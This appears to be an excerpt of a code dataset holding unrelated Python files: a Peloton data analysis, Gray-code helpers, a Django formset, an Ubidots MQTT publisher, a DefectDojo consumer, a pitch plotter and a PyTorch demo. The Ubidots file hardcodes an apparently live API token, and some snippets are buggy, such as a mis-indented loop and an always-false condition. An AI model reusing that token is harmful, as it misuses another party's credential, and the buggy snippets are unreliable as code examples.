"ride.overall_estimate",
"ride.difficulty_rating_avg",
"ride.difficulty_rating_count",
"ride.difficulty_level",
"ride.duration",
"ride.equipment_ids",
"ride.equipment_tags",
"ride.extra_images",
"ride.fitness_discipline",
"ride.fitness_discipline_display_name",
"ride.has_closed_captions",
"ride.has_pedaling_metrics",
"ride.home_peloton_id",
"ride.id",
"ride.image_url",
"ride.instructor_id",
"ride.is_archived",
"ride.is_closed_caption_shown",
"ride.is_explicit",
"ride.has_free_mode",
"ride.is_live_in_studio_only",
"ride.language",
"ride.origin_locale",
"ride.length",
"ride.live_stream_id",
"ride.live_stream_url",
"ride.location",
"ride.metrics",
"ride.original_air_time",
"ride.overall_rating_avg",
"ride.overall_rating_count",
"ride.pedaling_start_offset",
"ride.pedaling_end_offset",
"ride.pedaling_duration",
"ride.rating",
"ride.ride_type_id",
"ride.ride_type_ids",
"ride.sample_vod_stream_url",
"ride.scheduled_start_time",
"ride.series_id",
"ride.sold_out",
"ride.studio_peloton_id",
"ride.title",
"ride.total_ratings",
"ride.total_in_progress_workouts",
"ride.total_workouts",
"ride.vod_stream_url",
"ride.vod_stream_id",
"ride.captions",
"ride.excluded_platforms",
"created",
"device_time_created_at",
"achievement_templates",
"leaderboard_rank",
"total_leaderboard_users",
"ftp_info",
"ftp_info.ftp",
"ftp_info.ftp_source",
"ftp_info.ftp_workout_id",
"device_type_display_name"
'''
# Loop over the collected workout ids to pull per-workout metadata,
# calories (from the performance graph) and the instructor name.
for wkid in listOfWorkoutIds:
    workoutDetail = s.get(workoutDetailEndpoint % (wkid)).json()
    if workoutDetail['fitness_discipline'] != 'meditation':
        workoutDict = dict(workoutId=workoutDetail['id'], fitness_discipline = workoutDetail['fitness_discipline'], created_at = datetime.fromtimestamp(workoutDetail['created_at']))
        # Call performance endpoint to get calorie information
        workoutPerformanceDetail = s.get(workoutPerformanceEndpoint % (wkid)).json()
        # Calories are found in a list of dicts with a display name, slug and value
        calorieOutput = [i for i in workoutPerformanceDetail['summaries'] if (i['slug'] == 'calories')][0]['value']
        workoutDict['calories'] = calorieOutput
        workoutInstructorDetail = s.get(workoutInstructorEndpoint % (wkid)).json()
        # Instructor name lives at ride.instructor.name but may be absent
        if workoutInstructorDetail['ride']['instructor'] is None:
            workoutDict['instructorName'] = "Missing Instructor Information"
            print "Workout is missing Instructor information, Id= %s" % (wkid)
        else:
            workoutDict['instructorName'] = workoutInstructorDetail['ride']['instructor']['name']
        # Append each dict to the list feeding the dataframe below
        finalData.append(workoutDict)
    else:
        pass # Meditation classes are skipped — only active fitness is analyzed
# Convert the collected per-workout dicts to a Pandas dataframe
df = pd.DataFrame(finalData)
# Task 1: Plot Calories by Day
# Create a plain date column (drop the time component)
df['Date'] = df.apply(lambda row: row.created_at.date(), axis=1)
df2 = df.groupby("Date", as_index=False).calories.sum()
df2['Date'] = pd.to_datetime(df2.Date) #, format='%Y%m%d'
df2['DateName'] = df2.Date.apply(lambda x: x.strftime('%B %d, %Y'))
df2.sort_values(by=['Date'], inplace=True, ascending=True)
# fig, ax = plt.subplots()
# ax.plot('Date', 'calories', data=df2)
ax = df2.plot(x ='Date', y='calories', kind = 'bar', xticks=df.index)
ax.set_xticklabels(df2.DateName)
## Output and show chart 1
# plt.show()
# Average calories per day during Corona social distancing.
# Month/Year are parsed back out of the formatted DateName string,
# e.g. 'April 13, 2020' -> Month='April', Year='2020'.
df2['Month'] = df2['DateName'].str.split(" ", n=1, expand=True)[0]
df2['Year'] = df2['DateName'].str.split(" ", expand=True)[2]
df3 = df2[(df2['Year'] == '2020') & (df2['Month'].isin(['March', 'April']))]
average_calorie_per_day = df3['calories'].mean()
print "Average Calories Per Day during Corona, %s" % average_calorie_per_day
# Task 2: Number of classes per instructor
df4 = df.groupby("instructorName", as_index=True).count()[['workoutId']]
# Reset index so instructorName is a column in dataframe
df4 = df4.reset_index()
df4 = df4.rename(columns={'workoutId':'CountOfClasses'})
df4 = df4.sort_values(by=['CountOfClasses'], ascending=False)
ax = df4.plot(x='instructorName', y='CountOfClasses', kind='barh') #, orientation='horizontal')
plt.show()
# Perhaps to output to a csv at a later point to run through other tools:
# fields = ['peloton_id', 'user_id', 'title', 'fitness_discipline', 'total_work', 'total_leaderboard_users', 'leaderboard_rank']
# # , 'total_workouts', 'difficulty_rating_avg'
# # name of csv file
# filename = "MyPeletonData.csv"
# with open(filename, 'w') as csvfile:
# writer = csv.DictWriter(csvfile, fieldnames = fields)
# writer.writeheader()
# writer.writerows(mydict)
|
17,069 | 0a7c77c9d2582c323108f3606ed74d7420d3f109 | import numpy as np
def right_shift(binary, k=1, axis=-1):
    ''' Right shift an array of binary values.

    Zeros are shifted in at the front of ``axis`` and the trailing ``k``
    entries are dropped, so the output shape matches the input shape.

    Parameters:
    -----------
      binary: An ndarray of binary values.
      k: The number of bits to shift. Default 1.
      axis: The axis along which to shift. Default -1.

    Returns:
    --------
      Returns an ndarray with zero prepended and the ends truncated, along
      whatever axis was specified.
    '''
    # Shifting by at least the full width leaves nothing behind.
    if binary.shape[axis] <= k:
        return np.zeros_like(binary)

    ndim = len(binary.shape)

    # Pad k zeros at the start of `axis`, nothing on any other axis.
    pad_width = [(0, 0)] * ndim
    pad_width[axis] = (k, 0)

    # Keep everything except the trailing k entries along `axis`.
    keep = [slice(None)] * ndim
    keep[axis] = slice(None, -k)

    return np.pad(binary[tuple(keep)], pad_width,
                  mode='constant', constant_values=0)
def binary2gray(binary, axis=-1):
    ''' Convert an array of binary values into Gray codes.

    Implements the classic ``X ^ (X >> 1)`` construction, using a logical
    XOR so boolean / 0-1 arrays are handled uniformly.

    Parameters:
    -----------
      binary: An ndarray of binary values.
      axis: The axis along which to compute the gray code. Default=-1.

    Returns:
    --------
      Returns an ndarray of Gray codes.
    '''
    return np.logical_xor(binary, right_shift(binary, axis=axis))
def gray2binary(gray, axis=-1):
    ''' Convert an array of Gray codes back into binary values.

    Decoding applies the XOR-prefix trick log2(bits) times, halving the
    shift distance on every pass.

    Parameters:
    -----------
      gray: An ndarray of gray codes.
      axis: The axis along which to perform Gray decoding. Default=-1.

    Returns:
    --------
      Returns an ndarray of binary values.
    '''
    n_bits = gray.shape[axis]
    # Start with the largest power-of-two step below the bit width.
    step = 2 ** (int(np.ceil(np.log2(n_bits))) - 1)
    while step > 0:
        gray = np.logical_xor(gray, right_shift(gray, step))
        step //= 2
    return gray
|
17,070 | b63fe5898f0dbc1d6d2c1ca4c6659dfde829399e | fruits=["cherry","banana","apple"]
for x in fruits:
print(x)
|
17,071 | f70f624e705c365acd5b309f07e3ddf821b55856 | # Add your code below for question 7.
|
17,072 | 6e65269ddd1dade7fa437c33592ebb11ac2f025b | from django import forms
from django.forms import inlineformset_factory
from .models import Buy, BuyItem, BuyStock
class BuyItemForm(forms.ModelForm):
    """ModelForm for a single BuyItem row.

    Restricts the selectable ``item`` choices to active profiles and
    validates that ``buy_amount`` is at least 1.
    """

    class Meta:
        model = BuyItem
        fields = 'item', 'buy_amount', 'force_end',

    def __init__(self, *args, **kwargs):
        super(BuyItemForm, self).__init__(*args, **kwargs)
        # Narrow the item choices to active profiles only.  The model class
        # is taken from the field's default queryset, so this form needs no
        # direct import of the profile model.
        BuyProfile = self.fields['item'].queryset.model
        self.fields['item'].queryset = BuyProfile.objects.active()

    def clean_buy_amount(self):
        """Reject purchase amounts below 1.

        Raises forms.ValidationError for invalid values; returns the
        cleaned amount otherwise.  (An unreachable ``pass`` that followed
        the ``raise`` has been removed.)
        """
        buy_amount = self.cleaned_data['buy_amount']
        if buy_amount < 1:
            raise forms.ValidationError('1 이상의 값이 필요합니다.')
        return buy_amount
# Inline formset tying BuyItem rows to their parent Buy: up to 1000 rows,
# always rendering one extra blank form for new entries.
BuyItemFormSet = inlineformset_factory(Buy, BuyItem, BuyItemForm,
                                   fields=['item', 'buy_amount', 'force_end'],
                                   max_num=1000, extra=1
                                   )
|
17,073 | ca7f556d37d48e85038ee00e02613f9cd3000670 | # 잃어버린 괄호 : https://www.acmicpc.net/problem/1541
# BOJ 1541 (lost parentheses): minimise the expression by subtracting every
# '+'-group after the first one.
numbers_str = input().split('-')

# Sum each '+'-group with int() instead of eval():
#  - eval() on raw input is unsafe, and
#  - the old lstrip('0') trick (used to dodge leading-zero literals)
#    turned a bare "0" token into an empty string and crashed.
numbers = []
for expr in numbers_str:
    group_sum = sum(int(num_str) for num_str in expr.split('+'))
    numbers.append(group_sum)

# Everything after the first group is subtracted.
total = numbers[0]
for i in range(1, len(numbers)):
    total -= numbers[i]
print(total)
|
17,074 | febd10cd03cc8ca995827e428bba982e237f0d95 | sm=input()
# Print a verdict for every character of `sm` (read above).
for i in range(0,len(sm)):
    # NOTE(review): a character can never be alphabetic AND a digit at the
    # same time, so this condition is always False and every character
    # prints "Yes".  The intent was probably `or` or an isalnum() test —
    # confirm against the original problem statement before changing.
    if(sm[i].isalpha() and sm[i].isdigit()):
        print("No")
    else:
        print("Yes")
|
17,075 | d06ad2a8dd8fb473e9580ab0276b9e39729e004a | '''
Created on Mar 22, 2020
@author: Kratika Maheshwari
'''
from project import TempSensorAdaptorTask
'''
This Example sends harcoded data to Ubidots using the Paho MQTT
library.
Please install the library using pip install paho-mqtt
'''
import paho.mqtt.client as mqttClient
import time
import json
import random
'''
global variables
'''
connected = False # Stores the connection status
BROKER_ENDPOINT = "things.ubidots.com"
PORT = 1883
MQTT_USERNAME = "BBFF-08hJyBD6jtjlrxddzfS6pmyGfgMgX8" # Put your TOKEN here
MQTT_PASSWORD = ""
TOPIC = "/v1.6/devices/"
DEVICE_LABEL1 = "temperature-sensor"
VARIABLE_LABEL1 = "currenttemp"
DEVICE_LABEL2 = "humiditysensor"
VARIABLE_LABEL2 = "currentvalue"
DEVICE_LABEL3 = "pressuresensor"
VARIABLE_LABEL3 = "currentvalue"
'''
Functions to process incoming and outgoing streaming
'''
def on_connect(client, userdata, flags, rc):
    """Paho ``on_connect`` callback: flag a successful broker connection.

    A result code of 0 means the broker accepted the connection; the
    module-level ``connected`` flag is raised so waiters can proceed.
    Any other code is reported as a failure.
    """
    global connected

    if rc != 0:
        print("[INFO] Error, connection failed")
        return

    print("[INFO] Connected to broker")
    connected = True
'''
displays output when data is published
'''
def on_publish(client, userdata, result):
    """Paho ``on_publish`` callback: report that a message went out."""
    message = "[INFO] Published!"
    print(message)
'''
connect to the ubidots client
'''
def connect(mqtt_client, mqtt_username, mqtt_password, broker_endpoint, port):
    """Connect the Paho client to the broker and wait for the handshake.

    Installs the module-level callbacks, starts the network loop and then
    polls the ``connected`` flag (set by ``on_connect``) once a second for
    at most five attempts.

    Returns True once connected, False if the broker never answered.
    """
    global connected

    if connected:
        # Already connected; nothing to do.
        return True

    mqtt_client.username_pw_set(mqtt_username, password=mqtt_password)
    mqtt_client.on_connect = on_connect
    mqtt_client.on_publish = on_publish
    mqtt_client.connect(broker_endpoint, port=port)
    mqtt_client.loop_start()

    # Poll for on_connect to flip the flag, five tries max.
    for _ in range(5):
        if connected:
            break
        print("[INFO] Attempting to connect...")
        time.sleep(1)

    if not connected:
        print("[ERROR] Could not connect to broker")
        return False
    return True
'''
publish the payload to the specified topic
'''
def publish(mqtt_client, topic, payload):
    """Publish ``payload`` on ``topic``, logging (not raising) any failure."""
    try:
        mqtt_client.publish(topic, payload)
    except Exception as err:
        # Best-effort publish: report the problem and carry on.
        print("[ERROR] There was an error, details: \n{}".format(err))
'''
mqtt client connects with the ubidots cloud and send the data(payload) to connect method
'''
def ubidots(mqtt_client, curVal, data):
    """Send one sensor reading to the matching Ubidots device topic.

    ``data`` selects the device/variable pair ("temperature", "humidity"
    or "pressure"); ``curVal`` is JSON-encoded as the payload, the client
    is connected if needed, and the value is published.

    NOTE(review): any other ``data`` value leaves ``payload``/``topic``
    unassigned and the publish below raises NameError — confirm callers
    only ever pass the three supported names.
    """
    if(data=="temperature"):
        payload={VARIABLE_LABEL1: curVal}
        payload = json.dumps(payload)
        topic = "{}{}".format(TOPIC, DEVICE_LABEL1)
    elif(data=="humidity"):
        payload={VARIABLE_LABEL2: curVal}
        payload = json.dumps(payload)
        topic = "{}{}".format(TOPIC, DEVICE_LABEL2)
    elif(data=="pressure"):
        payload={VARIABLE_LABEL3: curVal}
        payload = json.dumps(payload)
        topic = "{}{}".format(TOPIC, DEVICE_LABEL3)
    if not connected:  # Connects to the broker
        connect(mqtt_client, MQTT_USERNAME, MQTT_PASSWORD,
                BROKER_ENDPOINT, PORT)
    # Publishes values
    print("[INFO] Attempting to publish payload:")
    print(payload)
    publish(mqtt_client, topic, payload)
|
17,076 | 297155b606d71e244cc4391a117019ebc2720e8d | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: mnist_utils.py
@time: 2017/12/13 10:48
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import os
path = os.path.dirname(__file__)
FLAGS = tf.app.flags.FLAGS
class MnistModel(object):
    """Static description of the MNIST input: 28x28 grayscale, 10 classes."""

    def __init__(self):
        # Image geometry.
        self.image_w = 28
        self.image_h = 28
        self.channel = 1
        # Number of target categories (digits 0-9).
        self.cat_num = 10
        # Flattened example length: width * height * channels.
        self.example_shape = self.image_w * self.image_h * self.channel
mnist = input_data.read_data_sets(path+"/MNIST_data/", one_hot=True)
if __name__ == '__main__':
pass |
17,077 | 181cd9c22f5a4b0d5254b49c2ee31bd88a4fcaa0 |
#def tempConvert(celcius, fahrenheit=((9/5)+32)):
# return(celcius*fahrenheit)
#tempConvert(float(input("Celcius? "))
def cel_to_fahr(c):
    """Convert a temperature from degrees Celsius to degrees Fahrenheit."""
    return c * 9 / 5 + 32
|
17,078 | 8af4caba9050dd8e7ce95759ae754e3224810d17 | import matchzoo as mz
import os
class DRMMConfig():
    """Hyper-parameters and save paths for training a MatchZoo DRMM model."""
    # preprocessor = mz.preprocessors.DRMMPreprocessor()
    optimizer = 'SGD'
    model = mz.models.DRMM
    generator_flag = 1   # presumably toggles generator-based feeding — confirm with the training script
    name = 'DRMM'
    num_dup = 1          # presumably MatchZoo pair-generator duplication count — verify
    num_neg = 4          # presumably negatives sampled per positive — verify
    shuffle = True
    ###### training config ######
    batch_size = 20
    epoch = 20
    ##### save config #####
    parent_path = '/ssd2/wanning/matchzoo/saved_model/drmm'
    save_path = os.path.join(parent_path,'')  # joining '' only appends a trailing separator
17,079 | 5dd11dab08e51de8ee4cde5766ea17a95af97a41 | from main.data.get_users import GetUsersRepoImpl
from main.domain.get_users_repo import GetUsersRepo
from main.domain.use_cases.get_users import GetUsersUseCase
def provide_use_case():
    """DI provider: build a fresh GetUsersUseCase per lookup."""
    return GetUsersUseCase()
def provide_repo():
    """DI provider: build a fresh GetUsersRepoImpl per lookup."""
    return GetUsersRepoImpl()
def get_users_binder(binder):
    """Register the use-case and repo provider functions on the DI binder.

    Each lookup of GetUsersUseCase / GetUsersRepo is routed through the
    corresponding module-level provider.
    """
    binder.bind_to_provider(GetUsersUseCase, provide_use_case)
    binder.bind_to_provider(GetUsersRepo, provide_repo)
|
17,080 | 6c196c0df5347c02dcbae407582344fee5a4e6a5 | import findspark
findspark.init()
from pyspark import SparkConf, SparkContext
from pyspark.sql import SparkSession
def add1(a, b):
    """Debug-print both operands, then return ``a + b + 100``.

    Used below as a reduceByKey merge function; the prints and the +100
    look like instrumentation for watching how Spark combines values.
    """
    separator = "*" * 55
    print(separator)
    print(a)
    print(b)
    return a + b + 100
def remove_outliers(nums):
    """Keep only values within 3 standard deviations of the mean.

    ``nums`` is presumably a numeric Spark RDD (it exposes .stats() and
    .filter()) — TODO confirm.  Note that stats.mean() is re-evaluated
    inside the lambda for every element.
    """
    stats = nums.stats()
    stddev = stats.stdev()
    return nums.filter(lambda x: abs(x - stats.mean()) < 3 * stddev)
if __name__ == '__main__':
sc = SparkContext('local', 'outliers')
# demo1
# nums = sc.parallelize([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1000])
# output = sorted(remove_outliers(nums).collect())
# print(output)
# demo2
rdd = sc.parallelize([('a', 1), ('b', 100), ('a', 300), ('b', 3), ('a', 200)])
a = sorted(rdd.reduceByKey(add1).collect())
print(a)
|
17,081 | 4068d200036c6d401171f2a037998621fc8ae44f | import argparse
import logging
from datetime import datetime
from api.proto import engine_pb2
from consumers.consumer import Consumer
from third_party.python.defectdojo_api import defectdojo
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class DefectDojoConsumer(Consumer):
    """Consumer that loads scan results from a PVC and files them as
    DefectDojo findings via the defectdojo_api client."""

    def __init__(self, config: dict):
        """Copy connection/targeting settings from ``config`` and build
        the DefectDojo API client.

        Raises AttributeError if no PVC location was supplied.
        """
        global logger  # NOTE(review): declared but never assigned; read-only use needs no `global`
        self.processed_records = 0
        self.pvc_location = config.pvc_location
        self.api_key = config.api_key
        self.dojo_url = config.dojo_url
        self.dojo_user = str(config.dojo_user)
        self.dojo_product = config.dojo_product
        self.dojo_engagement = config.dojo_engagement
        self.dojo_user_id = config.dojo_user_id
        # Lazily created on the first finding (see send_results).
        self.dojo_test_id = None
        self.dd = defectdojo.DefectDojoAPI(
            self.dojo_url, self.api_key, self.dojo_user, debug=False)
        if (self.pvc_location is None):
            raise AttributeError("PVC claim location is missing")

    def load_results(self) -> (list, bool):
        """Load results, preferring the enriched format.

        Returns (results, is_raw): falls back to plain results when
        enriched parsing raises SyntaxError.
        """
        try:
            return self._load_enriched_results(), False
        except SyntaxError:
            return self._load_plain_results(), True

    def _load_plain_results(self):
        """Load un-enriched LaunchToolResponse protobufs from the PVC."""
        scan_results = engine_pb2.LaunchToolResponse()
        return self.load_files(scan_results, self.pvc_location)

    def _load_enriched_results(self):
        """Load a set of LaunchToolResponse protobufs into a list for processing"""
        return super().load_results()

    def _send_to_dojo(self, data: dict, dojo_test_id: int, start_date: str):
        """Create a single DefectDojo finding from a flattened issue dict.

        Raises Exception if the DefectDojo API reports a failure.
        """
        # Map this pipeline's numeric severities onto DefectDojo labels.
        severity_map = {0: "Low", 1: "Low",
                        2: "Medium", 3: "High", 4: "Critical", 5: 'Info'}
        logger.debug("Sending to dojo")
        # todo (spyros): it also support marking findings as duplicates, if first_found is in
        # the past this can be a duplicate
        impact = "Possible product vulnerability"
        active = True
        verified = False
        mitigation = "Please triage and resolve"
        self.processed_records += 1
        description = ("scan_id: %s \n tool_name: %s \n type: %s \n confidence: %s\n"
                       "original_path=%s \n original description: %s" % (data['scan_id'],
                                                                         data['tool_name'],
                                                                         data['type'],
                                                                         data['confidence'],
                                                                         data['target'],
                                                                         data['description']))
        finding = self.dd.create_finding(data['title'],
                                         description,
                                         severity_map[data['severity']],
                                         0,
                                         start_date,
                                         self.dojo_product,
                                         self.dojo_engagement,
                                         dojo_test_id,
                                         self.dojo_user_id,
                                         impact,
                                         active,
                                         verified,
                                         mitigation,
                                         references=None,
                                         build=None,
                                         line=0,
                                         # TODO (spyros): this is a hack so we
                                         # can mark issues as "viewed",
                                         # remove when
                                         # https://github.com/DefectDojo/django-DefectDojo/issues/1609
                                         # gets implemented
                                         under_review=True,
                                         file_path=data['target'],
                                         false_p=str(data['false_positive']))
        if not finding.success:
            raise Exception(
                "Couldn't communicate to DefectDojo error message: %s" % finding.message)

    def send_results(self, collected_results: list, raw_issue: bool):
        """
        Take a list of *ToolResponse protobufs and sends them to DefectDojo
        If results are enriched, only the new, non-false positive results will be sent
        :param collected_results: list of LaunchToolResponse protobufs
        """
        for sc in collected_results:
            logger.debug("handling result")
            for iss in sc.issues:
                logger.debug("handling issue")
                if raw_issue:
                    logger.debug("issue is raw")
                    scan = sc
                    issue = iss
                    first_found = scan.scan_info.scan_start_time.ToJsonString()
                    false_positive = False
                else:
                    # Enriched entries wrap the original issue and carry
                    # dedup/false-positive metadata.
                    logger.debug("issue %s is enriched!" % iss.raw_issue.title)
                    issue = iss.raw_issue
                    first_found = iss.first_seen.ToJsonString()
                    false_positive = iss.false_positive
                    scan = sc.original_results
                if iss.count > 1:
                    logger.debug('Issue %s is a duplicate, count= %s, skipping' %
                                 (issue.title, iss.count))
                    continue
                if false_positive:
                    logger.debug(
                        'Issue %s has been marked as a false positive, skipping' % issue.title)
                    continue
                # Flatten everything _send_to_dojo needs into one dict.
                data = {
                    'scan_start_time': scan.scan_info.scan_start_time.ToJsonString(),
                    'scan_id': scan.scan_info.scan_uuid,
                    'tool_name': scan.tool_name,
                    'target': issue.target,
                    'type': issue.type,
                    'title': issue.title,
                    'severity': issue.severity,
                    'cvss': issue.cvss,
                    'confidence': issue.confidence,
                    'description': issue.description,
                    'first_found': first_found,
                    'false_positive': false_positive
                }
                start_date = datetime.strptime(
                    data.get('scan_start_time'), '%Y-%m-%dT%H:%M:%SZ').date().isoformat()
                # Create the DefectDojo "test" container lazily, once.
                if not self.dojo_test_id:
                    logger.info("Test %s doesn't exist, creating" %
                                scan.scan_info.scan_uuid)
                    start_date = datetime.strptime(
                        data.get('scan_start_time'), '%Y-%m-%dT%H:%M:%SZ').date().isoformat()
                    end_date = datetime.utcnow().date()
                    test_type = 2  # static Check sounds most generic, the python client
                    # won't accept adding custom title
                    # TODO (spyros): commit upstream
                    environment = 1  # development
                    test = self.dd.create_test(self.dojo_engagement,
                                               str(test_type),
                                               str(environment),
                                               start_date,
                                               end_date.isoformat())
                    if not test.success:
                        raise Exception(
                            "Couldn't create defecto dojo test: %s" % test.message)
                    self.dojo_test_id = test.id()
                self._send_to_dojo(data, self.dojo_test_id, start_date)
def main():
    """CLI entry point: parse arguments, load scan results and push them
    to DefectDojo.

    NOTE(review): the --raw flag is parsed but never read — whether the
    results are raw is decided by dd.load_results() itself.
    """
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument(
            '--pvc_location', help='The location of the scan results')
        parser.add_argument(
            '--raw', help='if it should process raw or enriched results', action="store_true")
        parser.add_argument(
            '--api_key', help='the api key for the defect dojo instance to connect to')
        parser.add_argument('--dojo_url', help='defectdojo api target url')
        parser.add_argument('--dojo_user', help='defectdojo user')
        parser.add_argument(
            '--dojo_product', help='defectdojo product for which the findings')
        parser.add_argument(
            '--dojo_engagement', help='defectdojo ci/cd style engagment for which you want to add'
            ' the test and findings')
        parser.add_argument(
            '--dojo_user_id', help='defectdojo id for the user you just specified')
        args = parser.parse_args()
        dd = DefectDojoConsumer(args)
    except AttributeError as e:
        raise Exception('A required argument is missing: ' + str(e))
    logger.info('Loading results from %s' % str(dd.pvc_location))
    collected_results, raw = dd.load_results()
    if len(collected_results) == 0:
        raise Exception('Unable to load results from the filesystem')
    logger.info("gathered %s results" % len(collected_results))
    logger.info("Reading raw: %s " % raw)
    dd.send_results(collected_results, raw)
    logger.info('Done, processed %s records!' % dd.processed_records)
|
17,082 | 6279a17da2e37352e530ec49984e335483ebe572 | from matplotlib.patches import Circle, Rectangle, Arc
import matplotlib.pyplot as plt
def draw_pitch(ax=None, color='white', bg_color=None, lw=0.75, x_label='', y_label=''):
    """Draw a 105x68 m football pitch onto a matplotlib axes.

    Parameters
    ----------
    ax : matplotlib axes to draw on; defaults to the current axes.
    color : line/goal colour for every pitch marking.
    bg_color : facecolor applied to the axes background.
    lw : line width of the markings.
    x_label, y_label : axis labels passed through to ax.set().
    """
    # Standard pitch dimensions in metres.
    pitch_width = 68.0
    pitch_length = 105.0
    goal_size = 7.32
    # if no axes is provided, set standard
    if ax is None:
        ax = plt.gca()
    # Penalty boxes (16.5 m deep) on both ends.
    penalty_area = Rectangle((0, pitch_width / 2 - 16.5 - goal_size / 2), 16.5, 40.3,
                             fill=0, edgecolor=color, linewidth=lw)
    penalty_area_r = Rectangle((pitch_length - 16.5, pitch_width / 2 - 16.5 - goal_size / 2), 16.5, 40.3,
                               fill=0, edgecolor=color, linewidth=lw)
    # Goalkeeper (six-yard) boxes.
    gk_area = Rectangle((0, pitch_width / 2 - 5.5 - goal_size / 2), 5.5, 18.32,
                        fill=0, edgecolor=color, linewidth=lw)
    gk_area_r = Rectangle((pitch_length - 5.5, pitch_width / 2 - 5.5 - goal_size / 2), 5.5, 18.32,
                          fill=0, edgecolor=color, linewidth=lw)
    # Penalty-arc segments outside each box, plus the penalty spots.
    penalty_circle = Arc((11, pitch_width / 2), 18.3, 18.3,
                         theta1=308, theta2=52, linewidth=lw, color=color, fill=False)
    penalty_circle_r = Arc((pitch_length - 11, pitch_width / 2), 18.3, 18.3,
                           theta1=126, theta2=234, linewidth=lw, color=color, fill=False)
    penalty_spot = Circle((11, pitch_width / 2), radius=0.25, color=color, linewidth=0)
    penalty_spot_r = Circle((pitch_length - 11, pitch_width / 2), radius=0.25, color=color, linewidth=0)
    # Goals drawn just outside the touchline.
    goal = Rectangle((-0.5, pitch_width / 2 - goal_size / 2), 0.5, goal_size, facecolor=color, linewidth=lw)
    goal_r = Rectangle((pitch_length, pitch_width / 2 - goal_size / 2), 0.5,
                       goal_size, facecolor=color, linewidth=lw)
    # Outer boundary, halfway division, corner arcs, centre mark and circle.
    outer_pitch = Rectangle((0, 0), pitch_length, pitch_width,
                            fill=0, edgecolor=color, linewidth=lw)
    left_side_pitch = Rectangle((0, 0), pitch_length / 2, pitch_width,
                                fill=0, edgecolor=color, linewidth=lw)
    bottom_corner = Arc((0, 0), 2, 2, theta1=0, theta2=90, linewidth=lw, color=color, fill=False)
    top_corner = Arc((0, pitch_width), 2, 2,
                     theta1=270, theta2=360, linewidth=lw, color=color, fill=False)
    bottom_corner_r = Arc((pitch_length, 0), 2, 2, theta1=90, theta2=180, linewidth=lw, color=color, fill=False)
    top_corner_r = Arc((pitch_length, pitch_width), 2, 2,
                       theta1=180, theta2=270, linewidth=lw, color=color, fill=False)
    centre_spot = Circle((pitch_length / 2, pitch_width / 2), radius=0.25, color=color, linewidth=0)
    kick_off = Circle((pitch_length / 2, pitch_width / 2),
                      radius=9.15, color=color, fill=False, linewidth=lw)
    pitch_elements = [penalty_area, penalty_area_r, gk_area, gk_area_r, goal, goal_r,
                      outer_pitch, kick_off, left_side_pitch, bottom_corner,
                      top_corner, penalty_circle, penalty_circle_r, penalty_spot,
                      penalty_spot_r, centre_spot, top_corner_r, bottom_corner_r]
    # draw all elements on the axes
    for element in pitch_elements:
        ax.add_patch(element)
    # turn of grid
    ax.grid(False)
    ax.set_facecolor(bg_color)
    ax.set(xlabel=x_label, ylabel=y_label)
|
17,083 | 28925551bb7ada722830bd1c198a952d77857e58 | #! /usr/bin/env python
# -*- coding:utf-8 -*-
"""
-------------------------------------
File name: Py01_regression.py
Author: Ruonan Yu
Date: 18-1-27
-------------------------------------
"""
import torch
import matplotlib.pyplot as plt
from torch.autograd import Variable
import torch.nn.functional as F # 激活函数在此
# *****************建立数据集****************
x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1) # x data (tensor),shape (100,1)
y = x ** 2 + 0.2 * torch.rand(x.size()) # noisy y data (tensor),shape=(100,1)
# 用Variable来修饰这些数据tensor
x, y = Variable(x), Variable(y)
# *****************建立神经网络***************
class Net(torch.nn.Module):
    """Minimal two-layer MLP: one ReLU hidden layer and a linear head."""

    def __init__(self, n_feature, n_hidden, n_output):
        """Build the layers.

        n_feature -- input dimensionality
        n_hidden  -- hidden-layer width
        n_output  -- output dimensionality
        """
        super(Net, self).__init__()
        self.hidden = torch.nn.Linear(n_feature, n_hidden)    # input -> hidden
        self.predict = torch.nn.Linear(n_hidden, n_output)    # hidden -> output

    def forward(self, x):
        """Forward pass: ReLU on the hidden layer, then the linear head."""
        hidden_act = F.relu(self.hidden(x))
        return self.predict(hidden_act)
# 定义net
net = Net(1, 10, 1)
# 快速搭建法
# net=torch.nn.Sequential(
# torch.nn.Linear(1,10),
# torch.nn.ReLU(),
# torch.nn.Linear(10,1)
# )
# print(net)
# 使用ion()命令开启交互模式
plt.ion()
plt.show()
# *****************训练网络*****************
# optimizer是训练的工具
optimizer = torch.optim.SGD(net.parameters(), lr=0.5) # 传入net的所有参数,学习率
loss_func = torch.nn.MSELoss() # 预测值和真实值的误差计算公式(均方误差)
# Training loop: 100 SGD steps on the quadratic toy data built above.
for t in range(100):
    prediction = net(x)              # forward pass on the training inputs
    loss = loss_func(prediction, y)  # MSE between prediction and target

    optimizer.zero_grad()            # clear gradients left from the last step
    loss.backward()                  # back-propagate the error
    optimizer.step()                 # apply the SGD parameter update

    # Visualise the fit every 5 steps.
    if t % 5 == 0:
        plt.cla()  # clear axis
        plt.scatter(x.data.numpy(), y.data.numpy())
        plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)
        # BUG FIX: `loss.data[0]` indexes a 0-dim tensor and raises on
        # PyTorch >= 0.4; `loss.item()` is the supported scalar accessor.
        plt.text(0.5, 0, r'$loss=%.4f$' % loss.item(), fontdict={'size': 10, 'color': 'red'})
        plt.pause(0.1)
# 关闭交互模式,防止图像一闪而过
plt.ioff()
plt.show()
|
17,084 | 7ec33be17897e2a769b69f52abf1b09f751ed351 | import os, glob
# Build this package's public name list from the .py files sitting next to
# this __init__, then import the package's submodules in one shot.
dirname = os.path.dirname(__file__)
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(dirname+"/*.py")]  # strip the ".py" suffix
try: __all__.remove('__init__')
except: pass  # NOTE(review): bare except also hides unrelated errors; only ValueError is expected here
__import__(os.path.basename(dirname), globals(), locals(), ('*',), 2)
|
17,085 | 16beb4ebd8b17f3e416ee94b667d3b22185ea6bd | # Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
